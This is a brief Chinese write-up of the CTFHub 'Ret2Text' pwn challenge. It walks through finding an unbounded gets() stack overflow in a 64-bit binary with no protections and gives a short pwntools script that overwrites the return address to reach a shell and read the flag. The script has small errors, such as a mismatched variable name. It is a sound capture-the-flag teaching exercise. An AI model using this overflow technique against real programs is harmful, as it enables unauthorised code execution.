本文主要是介绍CTFHUB(PWN)Ret2Text，对大家解决编程问题具有一定的参考价值，需要的程序猿们随着小编来一起学习吧！

首先检查保护机制 checksec

64 位 + 什么保护都没开

然后放到ida64中查看

发现gets函数,没有限制数据的长度,容易发生栈溢出

shift+F12 找到bin_sh函数地址

64位程序直接读取偏移量

构造payload,编写exp

from pwn import*
p=remote("ip",端口)
binsh_addr=地址
payload='a'*(0x70+8)+p64(bin_sh)
p.sendline(payload)
p.interactive

连接成功后ls

cat flag

这篇关于CTFHUB(PWN)Ret2Text的文章就介绍到这儿，希望我们推荐的文章对大家有所帮助，也希望大家多多支持为之网！